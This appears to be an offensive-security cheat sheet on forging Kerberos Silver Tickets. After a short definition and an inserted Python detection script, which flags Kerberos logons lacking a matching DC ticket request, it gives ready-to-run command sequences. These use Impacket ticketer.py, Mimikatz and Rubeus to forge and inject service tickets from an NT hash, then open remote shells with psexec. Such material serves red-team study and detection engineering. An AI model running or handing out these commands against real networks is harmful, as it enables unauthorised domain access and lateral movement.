Silver Tickets
A Silver Ticket is a custom Service Ticket that allows any domain user to gain access to any service on a computer.
An attacker can create a Service Ticket using an arbitrary domain account, a target SPN, and a forged Privilege Attribute Certificate (PAC) stating that this domain user has full access to the service.
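A defender-side check that follows from the ticket being created by the attacker rather than requested from a domain controller, as an added example that is not part of the original page: it flags Kerberos network logons (event 4624) on a host that have no matching service ticket request (event 4769) on the DC. The dict field names, the sample events and the 10-hour look-back window are assumptions made for this example.

```python
from datetime import datetime, timedelta

# Assumption: look back one default ticket lifetime (10 h) for the DC-side request.
WINDOW = timedelta(hours=10)

# Constructed sample events (not real logs), already parsed into dicts.
# Field names are simplified stand-ins for the Windows event fields.
DC_4769 = [  # "A Kerberos service ticket was requested", logged on the DC
    {"time": "2024-05-01T08:55:00", "user": "alice@WEELEE.ZIP", "service": "COMPUTER$"},
]
HOST_4624 = [  # logons recorded on computer.weelee.zip
    {"time": "2024-05-01T09:00:00", "user": "alice", "computer": "computer.weelee.zip",
     "package": "Kerberos", "logon_type": 3},
    {"time": "2024-05-01T09:30:00", "user": "weelee", "computer": "computer.weelee.zip",
     "package": "Kerberos", "logon_type": 3},
    {"time": "2024-05-01T09:45:00", "user": "bob", "computer": "computer.weelee.zip",
     "package": "NTLM", "logon_type": 3},
]

def _ts(value):
    return datetime.fromisoformat(value)

def unbacked_kerberos_logons(logons, tgs_requests, window=WINDOW):
    """Return Kerberos network logons with no DC-side 4769 for that user and host."""
    issued = {}
    for ev in tgs_requests:
        # Normalise "user@REALM" and the machine account "HOST$" to short lowercase names.
        key = (ev["user"].split("@")[0].lower(), ev["service"].rstrip("$").lower())
        issued.setdefault(key, []).append(_ts(ev["time"]))

    suspicious = []
    for ev in logons:
        if ev["package"] != "Kerberos" or ev["logon_type"] != 3:
            continue  # only Kerberos network logons present a service ticket
        key = (ev["user"].lower(), ev["computer"].split(".")[0].lower())
        when = _ts(ev["time"])
        # A ticket issued by the KDC leaves a 4769 at or before the logon, inside the window.
        backed = any(timedelta(0) <= when - req <= window for req in issued.get(key, []))
        if not backed:
            suspicious.append(ev)
    return suspicious

if __name__ == "__main__":
    for hit in unbacked_kerberos_logons(HOST_4624, DC_4769):
        print("no 4769 on DC for:", hit["user"], hit["computer"], hit["time"])
```

Gaps in DC log forwarding produce the same result as a forged ticket, so confirm 4769 coverage from every domain controller before acting on a hit.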
Exploit
## Create A Silver Ticket Using the NT Hash of the Target Account and Target SPN
ticketer.py -nthash [nt hash] -domain-sid [domain sid] -domain [domain] -spn cifs/computer.weelee.zip weelee
## Set Obtained .ccache to Kerberos Credential Cache
export KRB5CCNAME=[path to .ccache]
## Use Your Exec Tool of Choice to Access Your Specific Service
psexec.py [domain]/[username]@[computer] -k -no-pass

## Run Mimikatz.exe
Mimikatz.exe
## Create Silver Ticket And Inject The Ticket Into The Current Process
kerberos::golden /domain:weelee.zip /sid:[domain sid] /rc4:[nt hash] /service:cifs /target:computer.weelee.zip /user:weelee /ptt
## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd

## Create A Silver Ticket And Inject It Into The Current Process
Rubeus.exe silver /service:cifs/computer.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap /ptt
## Use Your Exec Tool Of Choice To Access Your Specific Service
PSexec.exe -accepteula \\computer.weelee.zip cmd
OR
## Create A Silver Ticket
Rubeus.exe silver /service:cifs/dc.weelee.zip /rc4:[nt hash] /user:weelee /domain:weelee.zip /sid:[domain sid] /nowrap
## Create A New Process And Inject The Silver Ticket Into It (User/Pass Can Be Anything)
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:weelee.zip /username:weelee /password:anypassword /ticket:[previous command output]
## Use A Tool To Impersonate The Process Created Above
Invoke-SharpImpersonation -Command "pid:[pid]"